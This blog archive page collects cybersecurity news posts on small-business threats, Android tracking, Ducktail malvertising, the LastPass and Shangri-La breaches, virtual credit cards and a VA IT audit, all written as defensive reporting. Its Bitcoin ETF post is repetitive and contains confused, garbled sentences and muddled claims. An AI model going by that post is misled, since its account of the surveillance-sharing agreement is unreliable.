Search This Blog
Powered by Blogger.

Blog Archive

Labels

About Me

Load More
Trendy Right Now

Popular Posts

Showing posts with label Information. Show all posts
SMB
BEC BEC frauds Cyber Attacks Information Information Security Ransomware attack SMB

SMB Cyber Threats: Information-Stealing Malware, Ransomware, and BEC

 

In today's digital landscape, small and medium-sized businesses (SMBs) are increasingly becoming prime targets for cybercriminals looking to exploit vulnerabilities for financial gain. A recent report from cybersecurity firm Sophos sheds light on the top cyber threats facing SMBs, highlighting information-stealing malware, ransomware, and business email compromise (BEC) as the most prevalent dangers. 

These malicious programs are designed to clandestinely gather sensitive data and login credentials, posing significant risks to businesses that may not have robust cybersecurity measures in place. The insidious nature of infostealers lies in their ability to operate discreetly, often evading detection until substantial damage has been done. 

Christopher Budd, director of Sophos X-Ops, underscores the escalating value of stolen data among cybercriminals, particularly concerning SMBs. He elucidates a hypothetical scenario where attackers exploit infostealers to compromise a business's accounting software, thereby gaining access to critical financial information and potentially siphoning funds into their own accounts. 

This underscores the dire consequences of falling victim to information-stealing malware, which can have far-reaching financial and reputational implications for SMBs. Despite the prevalence of infostealers, ransomware remains the most significant threat to SMBs' cybersecurity. While Sophos reports that the number of ransomware attacks has stabilized, the evolution of ransomware tactics continues unabated. 

One alarming trend highlighted in the report is the rise of remote encryption attacks, wherein threat actors leverage unmanaged devices within a victim organization to encrypt files on other systems. This sophisticated approach underscores the adaptability and persistence of ransomware operators in their quest to extort businesses for financial gain. 

Following closely behind ransomware, BEC attacks represent another formidable threat to SMBs. These attacks involve cybercriminals engaging in deceptive email correspondence or even phone calls with victims to gather sensitive information or manipulate them into transferring funds. The increasing sophistication of BEC tactics poses significant challenges for SMBs, as attackers leverage social engineering techniques to bypass traditional cybersecurity defenses. 

To mitigate these cyber threats effectively, SMBs must adopt a multi-faceted approach to cybersecurity. This includes implementing robust endpoint protection solutions, regularly updating software to patch known vulnerabilities, and providing comprehensive employee training on cybersecurity best practices. 

Additionally, adopting measures such as multi-factor authentication and encryption can add layers of security to sensitive data and communications, making it more challenging for cybercriminals to exploit vulnerabilities.

The SMBs must remain vigilant in the face of evolving cyber threats and prioritize cybersecurity as a fundamental aspect of their business operations. By staying informed about emerging threats and investing in proactive cybersecurity measures, SMBs can fortify their defenses and safeguard their digital assets against malicious actors. With cyber threats continuing to evolve in sophistication and scale, proactive cybersecurity measures are essential for protecting the interests and integrity of SMBs in today's digital landscape.
Read more »
Tracking
Android Apps Data Devices Google Information Location Mobile monitoring personalization Privacy Security Smartphone Tech Technology Tracking

Is Your Android Device Tracking You? Understanding its Monitoring Methods

 

In general discussions about how Android phones might collect location and personal data, the focus often falls on third-party apps rather than Google's built-in apps. This awareness has grown due to numerous apps gathering significant information about users, leading to concerns, especially when targeted ads start appearing. The worry persists about whether apps, despite OS permissions, eavesdrop on private in-person conversations, a concern even addressed by Instagram's head in a 2019 CBS News interview.

However, attention to third-party apps tends to overshadow the fact that Android and its integrated apps track users extensively. While much of this tracking aligns with user preferences, it results in a substantial accumulation of sensitive personal data on phones. Even for those trusting Google with their information, understanding the collected data and its usage remains crucial, especially considering the limited options available to opt out of this data collection.

For instance, a lesser-known feature involves Google Assistant's ability to identify a parked car and send a notification regarding its location. This functionality, primarily guesswork, varies in accuracy and isn't widely publicized by Google, reflecting how tech companies leverage personal data for results that might raise concerns about potential eavesdropping.

The ways Android phones track users were highlighted in an October 2021 Kaspersky blog post referencing a study by researchers from the University of Edinburgh and Trinity College. While seemingly innocuous, the compilation of installed apps, when coupled with other personal data, can reveal intimate details about users, such as their religion or mental health status. This fusion of app presence with location data exposes highly personal information through AI-based assumptions.

Another focal point was the extensive collection of unique identifiers by Google and OEMs, tying users to specific handsets. While standard data collection aids app troubleshooting, these unique identifiers, including Google Advertising IDs, device serial numbers, and SIM card details, can potentially associate users even after phone number changes, factory resets, or ROM installations.

The study also emphasized the potential invasiveness of data collection methods, such as Xiaomi uploading app window histories and Huawei's keyboard logging app usage. Details like call durations and keyboard activity could lead to inferences about users' activities and health, reflecting the extensive and often unnoticed data collection practices by smartphones, as highlighted by Trinity College's Prof. Doug Leith.
Read more »
threats
Advertising attacks Business Cloud CyberCrime Cybersecurity Duckport Ducktail Facebook Hijacking Information Linkedin malware Marketing Scams Security SocialEngineering SocialMedia Tactics threats

Vietnamese Cybercriminals Exploit Malvertising to Target Facebook Business Accounts

Cybercriminals associated with the Vietnamese cybercrime ecosystem are exploiting social media platforms, including Meta-owned Facebook, as a means to distribute malware. 

According to Mohammad Kazem Hassan Nejad, a researcher from WithSecure, malicious actors have been utilizing deceptive ads to target victims with various scams and malvertising schemes. This tactic has become even more lucrative with businesses increasingly using social media for advertising, providing attackers with a new type of attack vector – hijacking business accounts.

Over the past year, cyber attacks against Meta Business and Facebook accounts have gained popularity, primarily driven by activity clusters like Ducktail and NodeStealer, known for targeting businesses and individuals operating on Facebook. 

Social engineering plays a crucial role in gaining unauthorized access to user accounts, with victims being approached through platforms such as Facebook, LinkedIn, WhatsApp, and freelance job portals like Upwork. Search engine poisoning is another method employed to promote fake software, including CapCut, Notepad++, OpenAI ChatGPT, Google Bard, and Meta Threads.

Common tactics among these cybercrime groups include the misuse of URL shorteners, the use of Telegram for command-and-control (C2), and legitimate cloud services like Trello, Discord, Dropbox, iCloud, OneDrive, and Mediafire to host malicious payloads.

Ducktail, for instance, employs lures related to branding and marketing projects to infiltrate individuals and businesses on Meta's Business platform. In recent attacks, job and recruitment-related themes have been used to activate infections. 

Potential targets are directed to fraudulent job postings on platforms like Upwork and Freelancer through Facebook ads or LinkedIn InMail. These postings contain links to compromised job description files hosted on cloud storage providers, leading to the deployment of the Ducktail stealer malware.

The Ducktail malware is designed to steal saved session cookies from browsers, with specific code tailored to take over Facebook business accounts. These compromised accounts are sold on underground marketplaces, fetching prices ranging from $15 to $340.

Recent attack sequences observed between February and March 2023 involve the use of shortcut and PowerShell files to download and launch the final malware. The malware has evolved to harvest personal information from various platforms, including X (formerly Twitter), TikTok Business, and Google Ads. It also uses stolen Facebook session cookies to create fraudulent ads and gain elevated privileges.

One of the primary methods used to take over a victim's compromised account involves adding the attacker's email address, changing the password, and locking the victim out of their Facebook account.

The malware has incorporated new features, such as using RestartManager (RM) to kill processes that lock browser databases, a technique commonly found in ransomware. Additionally, the final payload is obfuscated using a loader to dynamically decrypt and execute it, making analysis and detection more challenging.

To hinder analysis efforts, the threat actors use uniquely generated assembly names and rely on SmartAssembly, bloating, and compression to obfuscate the malware.

Researchers from Zscaler also observed instances where the threat actors initiated contact using compromised LinkedIn accounts belonging to users in the digital marketing field, leveraging the authenticity of these accounts to aid in social engineering tactics. This highlights the worm-like propagation of Ducktail, where stolen LinkedIn credentials and cookies are used to log in to victims' accounts and expand their reach.

Ducktail is just one of many Vietnamese threat actors employing shared tools and tactics for fraudulent schemes. A Ducktail copycat known as Duckport, which emerged in late March 2023, engages in information stealing and Meta Business account hijacking. Notably, Duckport differs from Ducktail in terms of Telegram channels used for command and control, source code implementation, and distribution, making them distinct threats.

Duckport employs a unique technique of sending victims links to branded sites related to the impersonated brand or company, redirecting them to download malicious archives from file hosting services. Unlike Ducktail, Duckport replaces Telegram as a channel for passing commands to victims' machines and incorporates additional information stealing and account hijacking capabilities, along with taking screenshots and abusing online note-taking services as part of its command and control chain.

"The Vietnamese-centric element of these threats and high degree of overlaps in terms of capabilities, infrastructure, and victimology suggests active working relationships between various threat actors, shared tooling and TTPs across these threat groups, or a fractured and service-oriented Vietnamese cybercriminal ecosystem (akin to ransomware-as-a-service model) centered around social media platforms such as Facebook," WithSecure said.
Read more »
Technology
Bitcoin Bitcoin ETF cryptocurrency Cyberattacks CyberCrime Information NASDAQ Technology

BlackRock's Bitcoin ETF Reveals the Future of Cryptocurrency Surveillance

 


Surveillance is about to reach a new level as Blackrock awaits the SEC's confirmation regarding its Bitcoin ETF launch. An ETF tied to Bitcoin was filed on June 15 by the world's largest asset manager, reportedly the world's largest asset manager. In an era when the Securities and Exchange Commission (SEC) and other regulatory agencies crack down on the financial sector, the timing of the announcement was crucial.  

There were a few market observers who wondered if BlackRock, the world's largest asset manager, would have a better chance of securing approval than other competitors who had been rejected by the U.S. Securities and Exchange Commission when it filed to establish a spot bitcoin exchange-traded fund in the U.S. Their investigation quickly led them to identify an application feature that made it possible for authorities to be made aware of questionable trades. 

The Surveillance-Sharing Agreement (SSA), now commonly known as the Surveillance-Sharing Agreement (SSA), was introduced after BlackRock's application was submitted. Nevertheless, the issue of information-sharing agreements that change the balance of power and give regulators the authority to request details about the application will significantly impact the U.S. Securities and Exchange Commission's (SEC) decision. 

As a result of regulators' misgivings about its first effort to file for an exchange-traded fund that focuses on Bitcoin spot markets, BlackRock has submitted an amended application to the SEC to apply with an emphasis on Bitcoin spot markets.

It was announced recently by the Nasdaq exchange that BlackRock plans to finalize a surveillance agreement with Coinbase (COIN), addressing one of the main issues the Securities and Exchange Commission has raised when rejecting Bitcoin spot ETF applications in the past. In a new filing made by the Nasdaq exchange on BlackRock's behalf, the company explained that it intends to finalize the surveillance agreement with Coinbase (COIN).  

Bitcoin ETF is expected to be approved more quickly by the world's largest asset manager because of its strong financial background. The application also triggered a series of follow-up documents with the Surveillance-Sharing Agreement (SSA), which initiated several follow-up filings. The Securities and Exchange Commission may approve the application if the information-sharing agreement is crafted to give the regulator increased control over the application.  

A client of the agency claims there is a protocol in place that uses information sharing and surveillance to circumvent the manipulation of the cryptocurrency market. When the Winklevoss twins applied for a Bitcoin ETF in 2017, they were the first to bring these requirements to light. The details of the exchange of information between Coinbase and NASDAQ were also required as part of the request.  

As it seems, there is a tug-of-war between spot exchanges and regulators, ETF providers, and listing exchanges over how data surveillance carried out by spot exchanges will be administered. It was a great relief to see that the information-sharing agreement also allowed the exchange to share this data with the providers of ETFs and regulators.  

Here is a spotlight on specific trades or traders to spread information about them. In addition, the agreement would compel cryptocurrency exchanges to share data, including personally identifiable information (PII), with each other. The information contained in this report will include the names, addresses, and other details of the customers. According to Bitcoin ETF filings, no agreements allow information sharing. A similar structure is present in other markets, however, and this is similar to what is visible in the US.  

There is also the matter of specificity and the difference between the specific request for sharing information and the subpoena. This is also a significant factor. An individual familiar with the matter told a reporter that the proposed scenario might be more like a fishing expedition. This is where trade information is communicated between two points at the same time rather than across a wide spectrum.  

Cryptocurrency traders prefer to remain anonymous and keep their information private to avoid identification. For this reason, they came into the world of crypto trading. Nevertheless, if the Exchange Traded Fund strategy is to succeed, this will have to be addressed, if it is to succeed.  

There are some things to improve regarding the recent Bitcoin ETF applications submitted to the Securities and Exchange Commission. The Commission has asked applicants to resubmit their applications. Whether or not this scenario will benefit the crypto industry, and for what reason, can only be determined by time.  

What Are The Benefits of Sharing Information? 


Brokers and exchanges in equity markets know the unique combination of information and surveillance sharing. They have been doing this for a long time. Here the regulatory authority can ask for extra information regarding a client’s trading history, and they have to oblige.  

Suppose that a broker has a client, and NASDAQ receives an order from the broker on behalf of the client. In this instance, the exchange's SMARTS surveillance system flagged this order as suspicious to prevent execution. A suspicious activity report (SAR) must be filed by the broker and the exchange. 

Regulators can investigate the SAR report and ask for private information about a person. To achieve this goal, it is necessary to determine if the same beneficial owner is behind all trades. Depending on the facts of the case, a consolidated audit trial might be an appropriate course of action. 

The SEC may also approve all other filings submitted on the same day if it approves BlackRock's Bitcoin ETF. While there has been a lot of speculation regarding its functioning and sharing of information, one thing is certain: it will expose users to crypto assets, thus inadvertently increasing cryptocurrency adoption rates.  

According to BlackRock's revised application for a Bitcoin ETF, a new level of regulatory oversight is being implemented on digital currency markets. There is a possibility that regulatory dynamics will shift and a stronger focus on trade oversight. This will be done through a Surveillance-Sharing Agreement and partnerships with exchanges such as Coinbase.
Read more »
User Security
Breach Data Data Breach Information User Data User Privacy User Security

LastPass Experiences its Second Major Data Breach in 4 Months

 

LastPass's data breach in August permitted a hacker to infiltrate the company again and steal customer data. LastPass announced on Wednesday that it was investigating the breach, which involved a third-party cloud storage service linked to company systems. 
“We have determined that an unauthorized party, using information obtained in the August 2022 incident, was able to gain access to certain elements of our customers’ information,” the company wrote in a blog post(Opens in a new window). 

It is unknown what data was stolen. LastPass, on the other hand, has stated that customers' passwords should be safe because the company does not store(Opens in a new window) information on the "Master Password" that customers use to access the encrypted password vaults on the platform.

“We are working diligently to understand the scope of the incident and identify what specific information has been accessed. In the meantime, we can confirm that LastPass products and services remain fully functional,” the company said.  

Nonetheless, the incident demonstrates that the August breach at LastPass was more serious than previously thought. At the time, the company confirmed that the August breach only affected internal software development systems and did not include any customer password information. Despite this, the hacker was able to steal portions of the company's source code as well as some proprietary LastPass technical information, which likely paved the way for the subsequent intrusion.

LastPass also announced in September that it had completed its investigation into the breach with the assistance of cybersecurity firm Mandiant. According to the findings, the hacker only had access to the internal systems for four days. 

There was also no evidence of tampering. However, it appears that LastPass did not uncover all of the possible ways the hacker could use the access to breach the company again. LastPass did not identify the third-party cloud storage service used by the hacker to breach the company a second time. LastPass, on the other hand, has been sharing the cloud storage service with its affiliate GoTo. Private equity firms currently own both companies.

In response to the new breach, LastPass has implemented additional security measures and increased monitoring of its IT infrastructure. It has also contacted Mandiant and law enforcement to inquire about the hack.
Read more »
Virtual Credit Card
Credit Card Cyber Security Digital Cards Information Online Payments Virtual Credit Card

Is it Safe to Use Virtual Credit Cards?

 

People all over the world use the internet to pay their bills, buy goods and services, and transfer money. This has many benefits, but one major disadvantage is security: millions of people fall victim to fraud and identity theft each year. 

Staying safe online necessitates constant vigilance, secure software, and a variety of skills required to navigate the World Wide Web. However, when it comes to online payments, virtual credit cards can add an extra layer of security. Virtual credit cards are primarily short-term digital cards intended for one-day or even one-time use. A virtual card is linked to a physical credit card or bank account.

It generates a card number, expiration date, and security code at random. As a result, your true information is not visible to or shared with anyone. Consider the following scenario to better understand how virtual credit cards work. You've logged into your preferred e-commerce platform, added various items to your cart, entered your information, and are about to pay. Instead of entering your credit card number, you create a new virtual credit card and enter all of the required information from it.

You learn several weeks later that this e-commerce platform was compromised by an unknown threat actor. The cybercriminal gained access to the company's systems, injected malicious code into the website, and stole user data, including credit card numbers. Your information and bank account, however, are safe because you used a virtual credit card rather than a real, physical card. 

Because the virtual credit card you used has already expired, you can proceed without concern about the breach. This is essentially the purpose of virtual credit cards. They conceal your true identity from threat actors and safeguard you from cybercrime. They obviously provide more privacy than physical credit cards, which is an added bonus.

Virtual credit cards are clearly something that everyone who values their security (and their hard-earned money) should consider. So, how does one go about obtaining one? The answer may be disappointing, but your best option is to contact your bank and inquire about virtual credit cards. Many people nowadays do.

However, if your bank or card issuer is incapable to provide you with a virtual credit card for whatever reason, there is another service called Privacy that you could utilize. It is a simple and easy-to-understand online platform for creating virtual credit cards. Essentially, all you need to do is add a funding source, create a card, and you're ready to go.

Of course, privacy provides much more. Setting spending limits, creating an online wallet with multiple cards, setting recurring payments (great for subscription services), tracking your spending, and more are all possible with the platform. Privacy also has a mobile app and a chrome extension, enabling you to access the service from almost any device.

More notably, privacy is extremely safe. It is PCI-DSS compliant, which means it is held to the same standards as US banks. Internet Protocol Security (IPsec) with AES-256 encryption protects all data center communications, while Transport Layer Security protects web traffic (TLS). Customers' passwords are hashed, and their data is stored on servers spread across the globe.

Privacy has three different plans: personal, professional, and team. Personal is free, but you can only create 12 virtual credit cards each month. You can make up to 36 cards with Pro and up to 60 with Teams. These two plans charge $10 and $25 per month, respectively.

However, there is one major drawback to Privacy: it is only available to US citizens and legal residents, as well as residents of Puerto Rico, Guam, the Virgin Islands, the Northern Mariana Islands, and American Samoa. According to the company's official website, it is striving to make its services available globally, so keep an ear to the ground if you are not based in the US but require a virtual credit card.

The fact that virtual credit cards cannot be used in person is an evident disadvantage. You can, however, add some virtual credit cards to a safe and dependable mobile wallet and pay that way whenever possible.
 
The main disadvantage of using virtual credit cards over physical ones is that they are only destined for one-time or one-day use. Furthermore, even if a virtual card is not intended for temporary use, you would need to generate new ones on a regular basis to ensure maximum security. The issue is that if you pay for something online with your virtual credit card and then demand a refund because the goods do not arrive or receive the product damaged, you will have no way of getting your money back if the card number has already expired.

Another potential disadvantage is that you sometimes need to utilize the same card to pay for a service. For example, if you make a hotel reservation online using your virtual credit card but do not pay the full amount in advance, the hotel may ask you to pay for your room with the same card you used to book it—which you will be unable to do if your virtual credit card has already expired.

Virtual credit cards are secure, simple to use, free (or, at the very least, inexpensive), and will improve your security and privacy. Most importantly, they will safeguard you against fraud, theft, and other forms of cybercrime.

There is always the potential of having problems getting a refund or something similar, but that is probably a reasonable compromise for most people. And, until you get a virtual credit card, make sure you are familiar with the most common online shopping security threats and how to avoid them.
Read more »
User Security
Data Data Breach Information Leak User User Data User Privacy User Safety User Security

Shangri-La Reports Major Data Breach at Eight Hotels, Guests Data Leaked

 

A database breach at Shangri-La Group has potentially exposed the personal information of guests who stayed at its hotels in Singapore, Hong Kong, Chiang Mai, Taipei, and Tokyo. 

Mr. Brian Yu, the group's senior vice-president for operations and process transformation, stated in an e-mail to affected guests on Friday: "A sophisticated threat actor managed to bypass Shangri-IT La's security monitoring systems undetected and illegally accessed the guest databases." The breach occurred between May and July 2022, according to its investigation. 

Around the same time, Asia's top security summit, the Shangri-La Dialogue, returned to Singapore after a two-year hiatus due to the pandemic. From June 10 to 12, the event was held at the eponymous Shangri-La hotel on Orange Grove Road near Orchard Road. In the e-mail sent to the affected guests, Mr. Yu confirmed that certain data files had been stolen from the breached databases.

"Although we were not able to confirm the content of the exfiltrated data files, it is likely that they contained guest data," he added.

Upon being asked whether the Shangri-La Dialogue was specifically targeted, a hotel spokesman said, “There is no evidence to suggest any specific hotel or event was singled out. As a matter of policy, we do not disclose information about our guests.” 

"Data related to the Shangri-La Dialogue was stored on a separate secure server and was not affected in this incident," stated a spokesman for the event's organiser, the International Institute for Strategic Studies (IISS).

The Singapore Cyber Security Agency mentioned that it is aware of the incident and urged organisations to monitor and check their IT networks for signs of suspicious activity regularly. The  properties affected are listed below:

• Shangri-La Apartments, Singapore
• Shangri-La Singapore
• Island Shangri-La, Hong Kong
• Kerry Hotel, Hong Kong
• Kowloon Shangri-La, Hong Kong
• Shangri-La Chiang Mai
• Shangri-La Far Eastern, Taipei
• Shangri-La Tokyo

Following the discovery of unauthorised network activity, the hotel group said it hired cyber forensic experts to investigate the discrepancies. The databases of the hotels affected by this incident contained a combination of the following data sets: guest names, e-mail addresses, phone numbers, postal addresses, Shangri-La Circle membership numbers, reservation dates, and company names, according to the statement.

The hotel chain assured guests that there is currently no evidence that their personal information has been released or misused by third parties. As a precaution, in destinations where local regulations allow, it is providing affected guests with a one-year complimentary identity monitoring service provided by Experian, a third-party cyber security service provider.

"We deeply regret this has occurred and wish to assure you that all necessary steps have been taken to investigate and contain this incident. This notice provides information about what happened and how we can assist you," wrote Mr. Yu in the e-mail.

He ensured guests that data such as passport numbers, ID numbers, dates of birth, and credit card numbers with expiry dates are encrypted. "Protecting our guests' information is very important to us and we wish to assure you that all necessary steps have been taken to further strengthen the security of our networks, systems, and databases. Once again, we deeply regret any inconvenience or concerns this incident may cause."
Read more »
Vulnerabilities and Exploits
Bugs Data Flaws Information Safety Security Vulnerabilities and Exploits

Watchdog Finds, Over Half of Operating Systems at VA Medical Center in Texas are Outdated

 

According to an IT security assessment released on Tuesday by the Department of Veterans Affairs' Office of Inspector General, more than half of the network switches at the Harlingen VA Health Care Center in Harlingen, Texas, were running outdated operating systems and did not meet the department's baseline configurations. 

The audit was conducted to evaluate whether Harlingen was complying with the Federal Information Security Management Act, or FISMA, information security safeguards. The OIG stated that it chose Harlingen for an assessment because it had not previously been reviewed during the annual FISMA audit. 

Harlingen is part of the Texas Valley Coastal Bend Healthcare System, which receives approximately 300,000 outpatient visits per year. The OIG discovered flaws in three of the four security control areas at Harlingen, including configuration management, contingency planning and access controls. OIG’s inspection team did not document any issues with the center’s security management.

OIG discovered flaws in three of Harlingen's four security control areas, including configuration management, contingency planning, and access controls. The OIG inspection team found no problems with the centre's security management.

The audit found significant flaws in Harlingen's configuration management controls, which were used to identify and track the centre's hardware and software components. These flaws included an inaccurate component inventory list, unaddressed security flaws, and an inability to identify all critical and high-risk vulnerabilities across the centre's network.

Most concerning was OIG’s finding that “almost 53 per cent of the Harlingen centre’s network switches used operating systems that no longer receive maintenance or vulnerability support from the vendor.” And the outdated devices did not meet the baseline configurations for network equipment mandated by the VA Office of Information and Technology Configuration Control Board, which reflect “agreed-on specifications for systems or configuration items within those systems." 

“Network devices and IT systems are an organization’s most critical infrastructure,” OIG said in its assessment. “Upgrading is not just a defensive strategy but a proactive one that protects network stability.”

Despite VA's use of an automated inventory system, the OIG assessment revealed varying tallies of IT components at Harlingen. The VA discovered 1,568 devices at the centre, while the OIG assessment team discovered 1,544 devices on the Harlingen network. However, according to the audit, VA's Enterprise Mission Assurance Support Services system, or eMASS, which "allows for FISMA systems inventory tracking and reporting activities," only identified 942 devices.

“Because VA’s eMASS is used for developing system security and privacy plans, without an accurate inventory of network devices in eMASS, VA has no assurance that these plans implement security controls for all the components within the system,” the audit said. 

OIG's inspection team also compared on-site vulnerability scans from Jan. 10 to Jan. 13, 2022, with those conducted remotely by VA's Office of Information and Technology, and discovered 16 serious vulnerabilities on the Harlingen network that had not been mitigated within VA's established timeframe for addressing vulnerabilities. These included "five critical vulnerabilities on less than 1% of the computers and 11 high-risk vulnerabilities."

The OIG's inspection team also discovered that database managers were not adequately maintaining log data; that computer rooms and communications closets throughout the facility lacked fire detection systems; and that the computer room housing the center's police servers lacked a visitor access log. Furthermore, the OIG discovered that Harlingen's contingency plan "did not fully address reconstituting all systems to restore IT operations to a fully operational state following a disaster."

The OIG made four recommendations to the VA's assistant secretary for information and technology and chief information officer "due to enterprise-wide IT security issues similar to those identified during previous FISMA audits and IT security reviews." The OIG also made another recommendation to Harlingen's director to “validate that appropriate physical and environmental security measures are implemented and functioning as intended.” VA concurred with all five recommendations. 

VA has long struggled to meet FISMA requirements, with the Government Accountability Office stating in a November 2019 report that VA was one of the federal agencies with inadequate information security protections, including when it came to implementing effective security controls and mitigating vulnerabilities.

On Sept. 22, the OIG released a separate IT security assessment of the Alexandria VA Medical Center in Pineville, Louisiana, documenting deficiencies in three of the facility's four security control areas and discovering "critical and high-risk vulnerabilities on 37% of the devices."

The FISMA audit of VA's agencywide compliance for fiscal year 2021, released in April, found that the department as a whole "continues to face significant challenges in complying with FISMA due to the nature and maturity of its information security program.” OIG noted in Tuesday’s assessment of Harlingen that the FY2021 FISMA audit made 26 recommendations to VA, and that “all 26 recommendations were repeated from the prior year.”
Read more »
Subscribe to: Posts (Atom)